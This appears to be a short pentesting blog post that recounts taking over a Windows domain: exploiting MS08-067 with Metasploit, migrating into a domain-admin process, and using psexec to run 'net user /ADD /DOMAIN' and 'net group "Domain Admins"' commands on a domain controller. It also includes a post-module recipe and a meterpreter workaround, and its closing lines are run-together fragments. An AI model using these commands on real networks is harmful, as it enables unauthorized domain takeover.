Security, Programming, Pentesting
by {"login"=>"averagesecurityguy", "email"=>"stephen@averagesecurityguy.info", "display_name"=>"averagesecurityguy", "first_name"=>"", "last_name"=>""}
On a recent pentest, one of the goals was to gain domain admin access to the network. If you can compromise a domain controller you can use the commands net user username password /ADD /DOMAIN and net group "Domain Admins" username /ADD /DOMAIN. I found the domain controllers but was unable to identify a suitable vulnerability that would allow me to access them. However, I found another box on the domain that was vulnerable to MS08-067 (yes, there are still boxes that have not been patched for this vulnerability). Using metasploit I was able to get a meterpreter shell on this box. I then used the ps command to find out what processes were running. I found a few processes running under the administrator account for the domain. Next, I migrated to one of the processes and used the upload command in meterpreter to upload psexec to the box. Meterpreter uploads files to the default path for the user. Next, I used the shell command to drop into a shell and ran the commands psexec \\nameofdc net user username password /ADD /DOMAIN and psexec \\nameofdc net group "Domain Admins" username /ADD /DOMAIN. I now had my own user account with domain admin credentials.
/pentest/windows-binaries/pstools folder.net user and net group commands from any process running under any domain admin account. To identify the domain admins you can use the enum_domain_group_users post module. You need to background your meterpreter session and type use post/windows/gather/enum_domain_group_users. Then set the group name, set GROUP "Domain Admins", and session set SESSION 1. Then run it. You will get a list of domain admin users.stdapi_sys_process_execute: Operation failed: 1314, do this instead execute -f cmd.exe -c -i -H. This is a known issue in meterpreter.